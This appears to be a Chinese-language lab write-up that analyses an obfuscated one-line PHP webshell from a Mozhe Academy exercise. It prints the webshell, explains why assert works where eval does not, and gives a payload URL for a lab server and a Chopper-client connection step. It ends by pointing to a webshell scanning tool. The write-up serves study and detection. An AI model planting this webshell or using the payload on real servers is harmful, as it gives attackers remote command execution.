WebShell代码分析溯源(一)

WebShell代码分析溯源(一)

一、一句话变形马样本

<?php $_GET['POST']($_POST['GET']);?>

二、代码分析

1、调整代码格式

<?php

$_GET['POST']($_POST['GET']);

?>

2、分析代码，首先以GET方法接收url中POST参数传递的值，然后又以POST方法接收GET参数传递的值，因此可以构造payload:http://www.test.com/test.php?POST=assert,这样就相当于一句话木马变成这样: <?php assert($_POST['GET']);?>

注:不能使用eval,eval与assert的区别:

eval函数中参数是字符,eval并不支持可变变量形式

assert函数中参数为表达式 （或者为函数）

参考:

https://www.anquanke.com/post/id/173201/

https://blog.csdn.net/whatday/article/details/59168605

三、漏洞环境搭建

1、这里使用在线学习平台墨者学院中的实验环境(WebShell代码分析溯源(第1题))，地址: https://www.mozhe.cn/bug/detail/TkhnOVovVm14KzV6aTN5K2d1dFZ0Zz09bW96aGUmozhe

2、代码环境，下载代码

　　

3、找到webshell代码处，然后分析(上面已经分析过了)

　　

4、构造payload，然后使用菜刀连接

Payload: http://219.153.49.228:49785/www/cn-right.php?POST=assert

　　

四、后记

学习常用webshell扫描检测查杀工具---WebShellKillerTool (深信服webshell扫描检测引擎),网址: http://edr.sangfor.com.cn/tool/WebShellKillerTool.zip

使用深信服WebShellKillerTool进行webshell查杀